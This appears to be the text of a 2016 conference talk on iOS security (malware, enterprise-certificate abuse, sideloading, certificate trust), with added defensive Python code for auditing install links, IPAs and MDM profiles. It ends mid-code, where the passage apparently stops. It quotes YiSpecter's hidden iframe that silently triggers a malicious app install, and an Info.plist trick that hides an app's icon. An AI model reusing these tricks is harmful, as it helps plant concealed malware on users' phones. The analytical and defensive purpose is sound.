A Retrospective Security Review of Apple's Mobile Ecosystem

Raúl Siles, Founder & Senior Security Analyst, Dino Security S.L. (DinoSec)
raul@dinosec.com
Black Hat Sessions (www.blackhatsessions.com), June 23, 2016
www.dinosec.com, @dinosec

2016 © Dino Security S.L. All rights reserved.

Page 2

"iOS is considered to be by many in the industry one of the most secure mobile platforms"

Page 3

Outline

• iOS State-of-the-Art
• Malware
• Developers
• Lock Screen
• Digital Certificates
• Software Updates
• Wi-Fi
• Conclusions

Page 4

iOS State-of-the-Art

Page 5

Market Share: Mobile Devices

Q2 2015 (smartphone OS shipments):
• Android: 82.8%
• iOS: 13.9%
• Windows Phone: 2.6%
• BlackBerry: 0.3%
• Others: 0.4%

Consolidated trend: more than 300 million units shipped per quarter; 1.3 billion units in 2014.

Reference: http://www.idc.com/prodserv/smartphone-os-market-share.jsp

Page 6

iOS Version Adoption (March 2016)

https://developer.apple.com/support/app-store/
https://mixpanel.com/trends/#report/ios_9
https://david-smith.org/iosversionstats/

Page 7

Security By (CVE) Numbers

• iOS after 10 years…
  – 2007: iPhone 2G (iOS 1)
  – 2008: iPhone 3G (iOS 2)
  – 2009: iPhone 3GS (iOS 3)
  – 2010: iPhone 4 (iOS 4) + iPad 1
  – 2011: iPhone 4S (iOS 5) + iPad 2
  – 2012: iPhone 5 (iOS 6) + iPad 3 & 4 & mini
  – 2013: iPhone 5c & 5s (iOS 7) + iPad Air & mini 2
  – 2014: iPhone 6 & 6+ (iOS 8) + iPad Air 2 & mini 3
  – 2015: iPhone 6S & 6S+ (iOS 9) + iPad Pro 12.9" & mini 4
    • Apple Watch & Apple Pencil
  – 2016: iPhone SE + iPad Pro 9.7" (… iOS 10)

• Official numbers (CVEs fixed per release; "none" = release without security content):

  iOS 6 / 7: iOS 6: 197 · iOS 7: 80 · iOS 7.1: 41 · …

  iOS 8.x (272 total):
    iOS 8: 56 · 8.1: 5 · 8.1.1: 9 · 8.1.2: none · 8.1.3: 34 · 8.2: 6 · 8.3: 58 · 8.4: 33 · 8.4.1: 71

  iOS 9.x (292 total):
    iOS 9: 101 · 9.0.1: none · 9.0.2: 1 · 9.1: 49 · 9.2: 50 · 9.2.1: 13 · 9.3: 39 · 9.3.1: none · 9.3.2: 39

  watchOS (156 total):
    watchOS 1.0.1: 13 · 2.0: 39 · 2.0.1: 14 · 2.1: 30 · 2.2: 34 · 2.2.1: 26

Page 8

Malware?

Page 9

"If it has no name, it does not exist!"

How do we identify or classify malware families and specimens if there are no anti-virus (or anti-malware) solutions for iOS?
– Malware: CME (Common Malware Enumeration)
– Vulnerabilities: CVE (Common Vulnerabilities and Exposures)

Page 10

Recent iOS Malware Trends (1/2)

• "No iOS Zone" (DoS): malicious SSL certificates (iOS < 8.3) (Apr'15)
  – https://www.skycure.com/blog/ios-shield-allows-dos-attacks-on-ios-devices/
  – WiFiGate: https://www.skycure.com/blog/wifigate-how-mobile-carriers-expose-us-to-wi-fi-attacks/
• XARA: Unauthorized Cross-App Resource Access on Mac OS X and iOS (Jun'15)
  – https://drive.google.com/file/d/0BxxXk1d3yyuZOFlsdkNMSGswSGs/view?pli=1
  – http://www.imore.com/depth-look-ios-os-x-xara-vulnerabilities
• KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts (Aug'15) (jailbroken devices only)
  – http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/
• Masque attack(s)…
  – "Masque Attack: All Your iOS Apps Belong to Us" (Nov'14)
    • https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
  – WireLurker (Nov'14): http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/
  – "iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking" (Feb'15)
    • https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
  – "Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking" (Jun'15)
    • https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

Page 11

Recent iOS Malware Trends (2/2)

• …More Masque attack(s)
  – "iOS Masque Attack Weaponized: A Real World Look" (Aug'15)
    • https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
• XcodeGhost (Sep'15 & Nov'15)
  – http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/
  – https://blog.lookout.com/blog/2015/09/20/xcodeghost/
  – https://blog.lookout.com/blog/2015/09/21/xcodeghost-apps
  – https://blog.lookout.com/blog/2015/09/22/xcodeghost-detection/
  – https://www.fireeye.com/blog/threat-research/2015/11/xcodeghost_s_a_new.html
• ZergHelper: Pirated iOS App Store's Client (…) Evaded Apple iOS Code Review (Feb'16)
  – http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/
• AceDeceiver: iOS Trojan Exploiting Apple DRM Design Flaws (…) (Mar'16)
  – http://researchcenter.paloaltonetworks.com/2016/03/acedeceiver-first-ios-trojan-exploiting-apple-drm-design-flaws-to-infect-any-ios-device/

Page 12

iOS Malware

• Distributing Apps Out of the App Store
• Abusing Apple Private APIs

Page 13

Distributing Apps Out of the App Store

• Apple Developer Enterprise Program (vs. Apple Developer Program)
  – https://developer.apple.com/programs/enterprise/ ($299/year)
• Provision iOS apps for internal corporate distribution (in-house)
  – Enterprise certs and profiles can "only" be used for internal distribution
  – Technically, they can be used to install any app on any device
• Violating Apple's Developer Enterprise Program terms of service
  – Avoids Apple's App Store vetting process
• And it allows the usage of Apple private APIs (sensitive operations)
• User must accept the app installation (two taps)
  – In iOS 9 the user is additionally required to manually trust the developer (provisioning profile)

http://johannesluderschmidt.de/provision-ios-ipa-app-for-in-house-enterprise-distribution/

Page 14

"Two taps to rule them all"

Page 15

Apple Developer Enterprise Distribution Requirements

• Become an Apple enterprise "developer": $299/year
• Generate a certificate to distribute iOS apps
• Create a provisioning profile
• Create the iOS app IPA file & associated manifest file (PLIST)
  – The manifest file includes the reference to the IPA file (app)
• Create an "itms-services" web link pointing to the manifest
• Own a web server with a valid trusted certificate (HTTPS)
• Distribute the web link: e.g. tweet, web page, e-mail, Google dork, etc.
  – Real benign distribution cases in Spain and China

<a href="itms-services://?action=download-manifest&url=https://www.dinosec.com/dist/app/manifest.plist">Install this app!</a>
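The distribution chain above (web link, manifest, IPA) is also what a reviewer or incident responder has to pick apart when a suspicious install prompt appears. The following is an added example, not code from the original slides or from DinoSec: it extracts itms-services links from a page, pulls the manifest URL out of each, flags links buried in zero-sized iframes, and parses a manifest.plist to report the bundle identifier, the IPA URL and two things worth flagging (an IPA fetched over plain HTTP, and a title that impersonates an Apple app). The manifest layout (items / assets / metadata, "software-package" asset kind) is the one iOS expects; the HTML page, host names, manifest values and the list of Apple app titles are constructed for this example.

```python
"""Inspect over-the-air (itms-services) iOS app-distribution links and the
manifest.plist they point to.

Added example, not code from the original slides. The manifest layout
(items / assets / metadata, "software-package" asset kind) is the one iOS
expects for enterprise OTA installs; the HTML page, host names and manifest
values below are constructed for this example.
"""
import plistlib
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample page: a visible "Install" link plus a zero-sized iframe,
# the technique used to pop the enterprise install prompt on a mere page visit.
SAMPLE_HTML = """
<a href="itms-services://?action=download-manifest&url=https://dist.example.com/app/manifest.plist">Install this app!</a>
<iframe src="itms-services://?action=download-manifest&url=http://cdn.example.net/upload/update.plist" height=0 width=0></iframe>
"""

# Constructed manifest: an enterprise-signed app posing as an Apple one and
# fetched over plain HTTP (two things a reviewer should flag).
SAMPLE_MANIFEST = plistlib.dumps({
    "items": [{
        "assets": [{"kind": "software-package",
                    "url": "http://cdn.example.net/upload/app.ipa"}],
        "metadata": {"bundle-identifier": "com.example.hiddenIconLaunch",
                     "bundle-version": "2.3.0",
                     "kind": "software",
                     "title": "Passbook"},
    }]
})

ITMS_RE = re.compile(r"""(?:href|src)\s*=\s*["']?(itms-services://[^"'\s>]+)""", re.I)
ZERO_SIZE_IFRAME_RE = re.compile(
    r"""<iframe\b[^>]*\b(?:height|width)\s*=\s*["']?0\b[^>]*>""", re.I)
# Illustrative (constructed) list of Apple app names a third-party bundle should not reuse.
APPLE_APP_TITLES = {"Passbook", "Wallet", "Settings", "App Store", "Safari"}


def find_itms_links(html):
    """Every itms-services:// URL referenced from an <a href> or <iframe src>."""
    return ITMS_RE.findall(html)


def manifest_url(itms_link):
    """Manifest URL an itms-services:// link downloads, or None if it is not an install link."""
    query = parse_qs(urlparse(itms_link).query)
    if query.get("action") != ["download-manifest"]:
        return None
    return query.get("url", [None])[0]


def hidden_iframe_installs(html):
    """Install links hidden in zero-sized iframes: the prompt appears without a user click."""
    hits = []
    for tag in ZERO_SIZE_IFRAME_RE.findall(html):
        hits.extend(ITMS_RE.findall(tag))
    return hits


def inspect_manifest(manifest_bytes):
    """Per manifest item: (bundle identifier, IPA URL, list of findings)."""
    results = []
    for item in plistlib.loads(manifest_bytes).get("items", []):
        meta = item.get("metadata", {})
        ipa = next((a.get("url") for a in item.get("assets", [])
                    if a.get("kind") == "software-package"), None)
        findings = []
        if ipa is None:
            findings.append("no software-package asset")
        elif urlparse(ipa).scheme != "https":
            findings.append("IPA served over plaintext HTTP")
        if meta.get("title") in APPLE_APP_TITLES:
            findings.append("title impersonates an Apple system app")
        results.append((meta.get("bundle-identifier", ""), ipa, findings))
    return results
```

Running `inspect_manifest(SAMPLE_MANIFEST)` on the constructed manifest returns the bundle identifier, the HTTP IPA URL and both findings; `hidden_iframe_installs(SAMPLE_HTML)` returns only the link from the invisible iframe. The manifest itself still has to be served over HTTPS for iOS to accept it, which is why the slide lists "a web server with a valid trusted certificate" as a requirement; the IPA URL inside it is the part attackers are free to point anywhere.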

Page 16

Distributing Apps Out of the App Store: iOS 8 & 9

Page 17

Abusing Apple Private APIs (1/2)

• Objective-C
  – Message dispatch mechanism to invoke method/function calls: objc_msgSend
  – Class and method (selector) names are strings, not resolved statically but at runtime (execution time)
    • Those strings can be obfuscated and/or encrypted in the binary
  – Load a library (dlopen) and access a function (dlsym)
  – Or resolve at runtime through the Objective-C runtime (NSClassFromString / NSSelectorFromString)
• Apple's App Store review or vetting process
  – Looks for private APIs accessing sensitive user information; calls resolved at runtime leave no static reference for the review to find

Page 18

Abusing Apple Private APIs (2/2)

• "iRiS: Vetting Private API Abuse in iOS Applications" (Oct 2015)
  – Dynamic analysis of API calls that cannot be resolved statically ("suspicious")
  – 2,019 apps analyzed: 146 (7%) make use of 150 private APIs (25 critical)
• SourceDNA (Oct 2015): using the methods described in the previous slide…
  – 256 apps affected (+1 million downloads)
  – Youmi's Ad SDK (obfuscated binary ad library)
    • It sends user info to a server in China: list of installed apps, the app currently running, serial number, hardware components (peripherals), "e-mail" Apple ID…

http://www.cse.buffalo.edu/~mohaisen/classes/fall2015/cse709/docs/deng-ccs15.pdf
https://sourcedna.com/blog/20151018/ios-apps-using-private-apis.html

Page 19

YiSpecter (Oct 5, 2015)

• Distributed through an Apple Enterprise Developer certificate
  – Evades Apple's App Store vetting process
  – Targets both jailbroken and non-jailbroken iOS devices
• Extensive usage of private APIs
  – MobileInstallation: local app (.ipa file) install & uninstall capabilities
    • Claims the following private entitlement key used by iOS system apps: com.apple.private.mobileinstall.allowedSPI
  – Monitors the currently open app and displays advertisements
    • SpringBoardServices: SBSCopyFrontmostApplicationDisplayIdentifier
    • SpringBoardServices: SBSLaunchApplicationWithIdentifier
  – Obtains the list of installed apps: MobileInstallationLookup
  – Mobile Safari manipulation: default search engine, bookmarks, etc.

http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/

Hidden iframe used to trigger the enterprise app install prompt:

<iframe src="itms-services://?action=download-manifest&url=https://qvod.bb800.com/assets/upload/3794.plist" height=0 width=0></iframe>

Page 20

Abusing Apple iOS System Features

• Suppress the presence of the app icon from SpringBoard
  – Makes it harder to remove the app / malware (e.g. YiSpecter)
    • Alternative: reset the iOS device to factory defaults
• Info.plist file
  – Declares the app properties
  – Undocumented feature: suppresses SpringBoard from displaying the installed app icon
    • Intended for Apple's system apps without UI components
    • Deprecated as of iOS 8.3 (iOS 8: com.apple.*)

<dict>
    ...
    <key>CFBundleDisplayName</key>
    <string>Passbook</string>
    <key>CFBundleExecutable</key>
    <string>NoIcon</string>
    <key>CFBundleIdentifier</key>
    <string>com.weiying.hiddenIconLaunch</string>
    <key>CFBundleShortVersionString</key>
    <string>2.3.0</string>
    ...
    <key>SBAppTags</key>
    <array>
        <string>hidden</string>
    </array>
</dict>

http://www.zdziarski.com/blog/?p=5072
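Both the private-API discussion (objc_msgSend strings, dlopen/dlsym, NSClassFromString, the YiSpecter symbols) and the hidden-icon Info.plist trick above come down to things a static pre-check of an IPA can look for before anyone installs it. The following is an added example, not code from the original slides, from Zdziarski or from Palo Alto Networks: it flags an Info.plist that hides its icon with SBAppTags while not being an Apple bundle, lists private entitlements claimed in the entitlements plist, and scans a binary's bytes for the private symbols named on these slides and for the runtime-resolution primitives that let an app reach them without static references. When resolvers are present but no private names are visible, it reports that dynamic analysis is needed, which is exactly the "suspicious" case iRiS targets. The Info.plist, entitlements and the two binary blobs are constructed; the Apple display names used for the impersonation check are an illustrative list.

```python
"""Static pre-checks for a sideloaded or enterprise-distributed IPA:
hidden-icon tricks and private-API indicators.

Added example, not code from the original slides. The Info.plist key
(SBAppTags), the entitlement name and the private symbols come from the
slides; the sample plists and the stand-in binary blobs are constructed.
"""
import plistlib

# Private selectors/functions and the private-framework path named on the slides.
PRIVATE_SYMBOLS = (
    b"SBSCopyFrontmostApplicationDisplayIdentifier",
    b"SBSLaunchApplicationWithIdentifier",
    b"MobileInstallationLookup",
    b"/System/Library/PrivateFrameworks/",
)
# Runtime-resolution primitives: legitimate on their own, but they let an app
# reach private APIs without the target names appearing as static references.
DYNAMIC_RESOLVERS = (b"dlopen", b"dlsym", b"NSClassFromString",
                     b"NSSelectorFromString", b"objc_msgSend")
# Illustrative (constructed) list of Apple app names a third-party bundle should not reuse.
APPLE_APP_NAMES = {"Passbook", "Wallet", "Settings", "App Store", "Safari"}

# Constructed Info.plist modelled on the hidden-icon sample from the slides.
SAMPLE_INFO_PLIST = plistlib.dumps({
    "CFBundleDisplayName": "Passbook",
    "CFBundleExecutable": "NoIcon",
    "CFBundleIdentifier": "com.example.hiddenIconLaunch",
    "CFBundleShortVersionString": "2.3.0",
    "SBAppTags": ["hidden"],
})
# Constructed entitlements claiming the private key YiSpecter used.
SAMPLE_ENTITLEMENTS = plistlib.dumps({
    "application-identifier": "TEAMID.com.example.hiddenIconLaunch",
    "com.apple.private.mobileinstall.allowedSPI": True,
})
# Constructed stand-ins for a Mach-O binary: only the embedded strings matter here.
SAMPLE_BINARY = (b"\x00" * 16 + b"dlopen\x00dlsym\x00"
                 b"/System/Library/PrivateFrameworks/SpringBoardServices.framework\x00"
                 b"SBSCopyFrontmostApplicationDisplayIdentifier\x00" + b"\x00" * 16)
OBFUSCATED_BINARY = (b"\x00" * 16 + b"dlsym\x00NSSelectorFromString\x00"
                     b"U0JTQ29weUZyb250bW9zdEFwcGxp\x00" + b"\x00" * 16)  # names not in clear


def check_info_plist(info_plist_bytes):
    """Findings about Info.plist settings that hide or disguise the app on SpringBoard."""
    info = plistlib.loads(info_plist_bytes)
    bundle_id = info.get("CFBundleIdentifier", "")
    is_apple = bundle_id.startswith("com.apple.")
    findings = []
    if "hidden" in info.get("SBAppTags", []) and not is_apple:
        findings.append("SBAppTags=hidden on a third-party bundle (icon suppressed)")
    if info.get("CFBundleDisplayName") in APPLE_APP_NAMES and not is_apple:
        findings.append("display name impersonates an Apple system app")
    return findings


def check_entitlements(entitlements_bytes):
    """Private entitlement keys (com.apple.private.*) claimed by the app."""
    return [key for key in plistlib.loads(entitlements_bytes)
            if key.startswith("com.apple.private.")]


def scan_binary_strings(blob):
    """(private symbols seen, resolvers seen, needs_dynamic_analysis).

    needs_dynamic_analysis is True when resolvers are present but no private
    name is visible: the targets may be obfuscated or assembled at runtime,
    so only instrumentation (the iRiS approach) can settle what gets called.
    """
    private = [s.decode() for s in PRIVATE_SYMBOLS if s in blob]
    resolvers = [s.decode() for s in DYNAMIC_RESOLVERS if s in blob]
    return private, resolvers, bool(resolvers) and not private
```

Run on the constructed inputs, `check_info_plist` reports both the hidden tag and the Passbook disguise, `check_entitlements` returns the allowedSPI key, and `scan_binary_strings` distinguishes the blob with plaintext private symbols from the one that only carries `dlsym`/`NSSelectorFromString` and an encoded string. A clean string scan is therefore not a clean bill of health: it is the prompt to run the app and watch what it resolves.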

Page 21

Another way of Temporarily Hiding iOS Apps

• iOS 7, 8 & 9 (up to 9.3.2), non-jailbroken iOS devices
• The first SpringBoard pane (home screen) and the dock must be completely full of apps
  – The app to hide must be dragged onto another app (creating a folder) and then into the dock, at the end
• Hidden apps are still accessible from Spotlight search
  – Hidden apps are still visible from Settings – General – Storage & iCloud Usage – [Storage] Manage Storage – (list of installed apps)
• Hidden apps are restored after the iOS device reboots

https://www.youtube.com/watch?v=NlA-B_98K78

Page 22

Temporarily Hiding iOS Apps

Page 23

Developers

Page 24

"Is this a bug or a feature?"

Page 25

What Is This?

• WWDC, San Francisco, June 13-17, 2016
  – Apps in the App Store: 2,000,000 (from 500 to 2M in 8 years)
  – Downloaded 130,000,000,000 times
  – Registered developers: 13,000,000
  – 2 million registered in the last year alone
• Anything strange here?

Page 26

Developing for the Apple Mobile Ecosystem

• Apple developer membership options
  – Individual: free, or Apple Developer Program ($99/year)
  – Organization: Apple Developer Program ($99/year) or Apple Developer Enterprise Program ($299/year)
• Prior to Xcode 7 (Sep 2015)
  – Rigorous control over the iOS developer community (regulated market)
• After Xcode 7: iOS app sideloading
  – A free Apple ID is all you need to start running any code on iOS devices
    • No extensive Apple ID checks: anonymity via fake Apple IDs (e-mails)
    • A malware developer just needs physical access to an iOS device (USB connection)
    • Install, or even replace legitimate, iOS apps with malicious ones…

https://www.mi3security.com/why-2016-may-be-the-year-of-ios-malware/

Page 27

iOS App Sideloading

Page 28

Advanced App Capabilities

https://developer.apple.com/support/app-capabilities/

Page 29

Su-A-Cyder (1/2)

• Toolset or framework to generate trojanized iOS apps / malware
  – Take a decrypted iOS app, inject it with evil code, resign the app with any Apple ID, and install the repackaged app on any non-jailbroken iOS device
  – "Home-Brewed iOS Malware PoC Generator" (Black Hat Asia 2016)
    • http://blackhat.com/asia-16/briefings.html#su-a-cyder-homebrewing-malware-for-ios-like-a-b0$$
  – Threat or attack vector (not a vulnerability, and not malware)
• User must accept the app installation prompt
  – Unlocked iOS device
• Full access to most data within the trojanized app
  – Corporate credentials, VPN access, healthcare records, etc.
  – Location info (GPS or EXIF), address book, calendar, HealthKit, etc.

https://www.mi3security.com/su-a-cyder-ios-malware/

Page 30

Su-A-Cyder (2/2)

• Based on open-source tools
  – Cydia, Theos(-jailed), libimobiledevice, insert_dylib & Spaceship/Fastlane
  – By Mi3 Security (Chilik Tamir)
• Evil .dylib (no need for the original source code), e.g. Cycript
• Provisioning profile (Apple ID)
• Untrusted developer: the developer app certificate must be trusted on the target iOS device
  – Settings – General – Device Management: Developer App (by Apple ID)
  – Trust "Apple ID" (developer)
  – Verify App via network connection for a specific iOS device (& Delete Apps)

https://github.com/Mi3Security/su-a-cyder

Page 31

Su-A-Cyder: Skype

Based on: https://www.youtube.com/watch?v=oscx8AC0qUI

Page 32

SandJacking

• Su-A-Cyder app upgrades fixed by Apple in iOS 8.3
  – Install process denies app upgrades with mismatched app ID (bundle ID)
• Alternative attack vector for iOS 8.3+
  – Back up the device
  – Delete the legitimate app
  – Install the evil app
  – Restore the backup over the evil app
• HITB (May 2016) by Mi3 Security (Chilik Tamir)
  – PoC tool, SandJacker, not released until it is fixed by Apple

https://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Chilik%20Tamir%20-%20Profiting%20from%20iOS%20Malware.pdf

Page 33

SideStepper

• Attack vector targeting enterprise MDM solutions and iOS devices
  – Allows installing malicious apps on non-jailbroken iOS devices
  – iOS 9 or greater
• Install a malicious iOS configuration profile to perform MITM attacks
  – Hijack communications between the iOS device and the MDM solution (VPN or proxy)
• When combined with a rogue alternate enterprise app store, it facilitates the installation of additional (potentially malicious) apps
  – Bypasses Apple's centralized App Store verification and distribution process
  – Hijack any MDM command and replace it with a request to install a malicious app
  – iOS natively trusts any (enterprise) app installed by MDM solutions, showing no indication of its origin (vs. the tedious iOS 9 trust process for enterprise app installation)

https://www.checkpoint.com/resources/sidestepper-ios-vulnerability/

Page 34

iOS Malicious Apps Distribution Vectors

• Jailbroken iOS device
  – iOS version? Vulnerable to jailbreak? Local or remote? 0-day?
• Non-jailbroken iOS device
  – App Store
    • All code must be signed by an identified developer + Apple's review or vetting process
    • Malware in the official App Store
      – Coin your own definition of mobile malware: WhatsApp, LinkedIn…
      – LBTM, InstaStock, FindAndCall, Jekyll, FakeTor, XcodeGhost, InstaAgent, abusing private APIs (e.g. Youmi's Ad SDK), ZergHelper, AceDeceiver (Apple's DRM flaws: FairPlay)
  – Out of the App Store
    • Abuse private APIs (out of Apple's App Store review process)
    • Remote: abusing Apple Enterprise Developer Certificates
      – Third-party app stores: vShare, 25PP, Kuaiyong, 7659, etc.
      – Malicious apps: FinFisher, Pangu, Masque Attack, WireLurker, Hacking Team, Oneclickfraud, YiSpecter…
    • Local: sideloading iOS apps in Xcode 7
      – Su-A-Cyder and SandJacker
    • MDM: SideStepper

Page 35

Digging in the Old Trunk (iOS 9.3.2)

Page 36

Lock Screen

Page 37

"Voice Hacking"

Page 38

Bypassing iOS Lock Screen History

• Between 2011-2016…
  – iOS 5.x: 4 vulnerabilities
  – iOS 6.x: 8 vulnerabilities
  – iOS 7.x: 12 vulnerabilities
  – iOS 8.x: 11 vulnerabilities
  – iOS 9.x: 6 vulnerabilities (up to now, iOS 9.3.2…)
• Smart Cover, SIM card, Control Center, Notification Center, Siri…
• Temporary unauthorized physical access to the device
  – Just a few seconds (or minutes)

http://blog.dinosec.com/2014/09/bypassing-ios-lock-screens.html
(Updated with every single iOS version since Sep 2014; history goes back to 2011)

Page 39

Bypassing iOS Lock Screen Via Siri

New iOS version released just to fix one of these bugs: iOS 9.0.2 (CVE-2015-5923)

Page 40

Digital Certificates

Page 41

"If there is no CVE, there is no vulnerability"

"Today, I'm proud to say that at the end of 2016, App Transport Security (ATS) is becoming a requirement for App Store apps" (Ivan Krstic, Apple's head of security engineering and architecture, WWDC 2016)

Page 42

"Continue" or "Details – Trust"

What Is This?

The double button of mass destruction!!

Page 43

(Un)Manageable Digital Certificates

• Mobile Safari: once the user accepts an untrusted certificate, iOS will never ask the user about that certificate again…
  – Never ever! (iOS 9.3.2)
  – Settings – Safari: "Clear History and Website Data" does not help
  – Not even after rebooting the iOS device…
• Not new: since iOS 7, and in previous iOS versions (e.g. 5.1.1) Settings – Safari – "Clear Cookies and Data" (and/or rebooting) does not help either!

Timeline: < 2012 (?)

Page 44

Digesting Digital Certificates

Page 45

Managing Digital Certificates?

• Alternatively, before connecting to any website via Mobile Safari, install self-signed certs as configuration profiles
  – Settings – General – Profiles
• Delete the "offending" cert by…
  – … "Never use a cannon to kill a fly" (Confucius)
  – Removing all settings (or, at least, all network settings)…
    • Settings – General – Reset – Reset All Settings
    • Settings – General – Reset – Reset Network Settings
• Configuration profile (MDM)
  – Security & Privacy: "Accept untrusted TLS certificates"
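The MDM option on the last bullet is the one control that actually removes the "Continue" / "Details – Trust" button instead of cleaning up after it. The following is an added example, not code from the original slides or from Apple: it builds two unsigned .mobileconfig profiles with Python's plistlib, one that leaves the default behaviour (the user may still accept an untrusted certificate) and one that sets the Restrictions key allowUntrustedTLSPrompt to false and also installs a corporate root CA so that internal self-signed services stop triggering the prompt in the first place. An audit function then reads any profile back and reports what it would change about TLS trust, which is the same question to ask of a profile a user was tricked into installing (the SideStepper slide). The PayloadType names and the allowUntrustedTLSPrompt key are Apple's configuration-profile keys; the identifiers, display names and the certificate bytes are constructed placeholders, not a real CA.

```python
"""Build and audit an iOS configuration profile that removes Safari's
"Continue" / "Details - Trust" escape hatch for untrusted TLS certificates.

Added example, not from the original slides. PayloadType names and the
allowUntrustedTLSPrompt key are Apple's configuration-profile keys; the
identifiers, display names and the stand-in certificate bytes are constructed.
"""
import plistlib
import uuid

# Constructed placeholder, not a real certificate: a real payload carries the
# DER-encoded CA certificate to trust.
FAKE_CA_DER = b"\x30\x82\x01\x00" + b"\x00" * 16


def restrictions_payload(allow_untrusted_tls_prompt):
    """Restrictions payload. False: Safari auto-rejects untrusted certs, no Trust button."""
    return {
        "PayloadType": "com.apple.applicationaccess",
        "PayloadVersion": 1,
        "PayloadIdentifier": "com.example.mdm.restrictions",
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadDisplayName": "TLS trust restrictions",
        "allowUntrustedTLSPrompt": allow_untrusted_tls_prompt,
    }


def root_cert_payload(der_bytes, display_name):
    """Root-certificate payload: installs a CA the device will trust for TLS."""
    return {
        "PayloadType": "com.apple.security.root",
        "PayloadVersion": 1,
        "PayloadIdentifier": "com.example.mdm.ca." + display_name.lower().replace(" ", "-"),
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadDisplayName": display_name,
        "PayloadContent": der_bytes,
    }


def build_profile(payloads, display_name="Example TLS policy"):
    """Serialise an (unsigned) .mobileconfig wrapping the given payloads."""
    return plistlib.dumps({
        "PayloadType": "Configuration",
        "PayloadVersion": 1,
        "PayloadIdentifier": "com.example.mdm.tls-policy",
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadDisplayName": display_name,
        "PayloadContent": payloads,
    })


def audit_profile(profile_bytes):
    """What a .mobileconfig would change about TLS trust: prompt disabled? CAs added?"""
    profile = plistlib.loads(profile_bytes)
    report = {"untrusted_tls_prompt_disabled": False, "root_cas_added": []}
    for payload in profile.get("PayloadContent", []):
        ptype = payload.get("PayloadType")
        if ptype == "com.apple.applicationaccess" and payload.get("allowUntrustedTLSPrompt") is False:
            report["untrusted_tls_prompt_disabled"] = True
        if ptype in ("com.apple.security.root", "com.apple.security.pkcs1"):
            report["root_cas_added"].append(payload.get("PayloadDisplayName"))
    return report


# Weak: the default, the user can still tap through. Hardened: prompt removed,
# corporate CA installed so legitimate internal sites no longer need it.
WEAK_PROFILE = build_profile([restrictions_payload(True)])
HARDENED_PROFILE = build_profile([restrictions_payload(False),
                                  root_cert_payload(FAKE_CA_DER, "Corp Root CA")])
```

`audit_profile(HARDENED_PROFILE)` reports the prompt as disabled and "Corp Root CA" as added; the same function run over a profile found on a device is the quickest way to see whether someone has planted a CA or, conversely, whether the prompt restriction is in place. Unsigned profiles like these still need the user to accept them in Settings; pushed through an enrolled MDM they install silently, which cuts both ways, as the SideStepper slide shows.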

Page 46

Software Updates

Page 47

"Once a vulnerability gets a CVE assigned, and the vendor says it has been fixed… you don't need to worry anymore, right?"

Page 48

iOS & WatchOS Software Updates

• "iOS - Back to the Future" (March 2014) & "II" (December 2014)
  – Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2014iOS
• iOS: Settings – General – Software Update
  – http://mesu.apple.com/assets/com_apple_MobileAsset_SoftwareUpdate/com_apple_MobileAsset_SoftwareUpdate.xml
  – http://mesu.apple.com/assets/com_apple_MobileAsset_SoftwareUpdateDocumentation/com_apple_MobileAsset_SoftwareUpdateDocumentation.xml
• watchOS: Watch app – General – Software Update
  – http://mesu.apple.com/assets/watch/com_apple_MobileAsset_SoftwareUpdate/com_apple_MobileAsset_SoftwareUpdate.xml
  – http://mesu.apple.com/assets/com_apple_MobileAsset_WatchSoftwareUpdateDocumentation/com_apple_MobileAsset_WatchSoftwareUpdateDocumentation.xml

Timeline: 2014
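The catalogs behind Settings – General – Software Update are plists, so whether a given device should be offered an update can be answered offline from a saved copy of the XML. The following is an added example, not code from the original talk or from Apple: it parses a MobileAsset catalog, keeps the assets that apply to a device (full updates, plus delta assets only when their PrerequisiteBuild matches the installed build), picks the newest by numeric version, and says whether the device is behind. The keys used (Assets, OSVersion, Build, SupportedDevices, PrerequisiteBuild, __BaseURL, __RelativePath) follow the catalog layout; the catalog contents below are constructed, with an invalid download host.

```python
"""Parse an Apple MobileAsset software-update catalog (the mesu.apple.com
XML files from the slides are plists) and tell whether a device is behind.

Added example, not code from the original talk. The keys used (Assets,
OSVersion, Build, SupportedDevices, PrerequisiteBuild, __BaseURL,
__RelativePath) follow the catalog layout; the catalog contents below are
constructed, with an invalid download host.
"""
import plistlib

BASE = "http://updates.example.invalid/"

# Constructed catalog: two full updates, one delta that only applies from
# build 13E238, and an iPad-only build of the same version.
SAMPLE_CATALOG = plistlib.dumps({"Assets": [
    {"OSVersion": "9.3.1", "Build": "13E238",
     "SupportedDevices": ["iPhone8,1", "iPhone8,2"],
     "__BaseURL": BASE, "__RelativePath": "iPhone_9.3.1_13E238.ipsw"},
    {"OSVersion": "9.3.2", "Build": "13F69",
     "SupportedDevices": ["iPhone8,1", "iPhone8,2"],
     "__BaseURL": BASE, "__RelativePath": "iPhone_9.3.2_13F69.ipsw"},
    {"OSVersion": "9.3.2", "Build": "13F69", "PrerequisiteBuild": "13E238",
     "SupportedDevices": ["iPhone8,1"],
     "__BaseURL": BASE, "__RelativePath": "iPhone_9.3.2_13F69_delta.zip"},
    {"OSVersion": "9.3.2", "Build": "13F72",
     "SupportedDevices": ["iPad6,3"],
     "__BaseURL": BASE, "__RelativePath": "iPad_9.3.2_13F72.ipsw"},
]})


def version_key(version):
    """'9.3.2' -> (9, 3, 2) so versions compare numerically, not as strings."""
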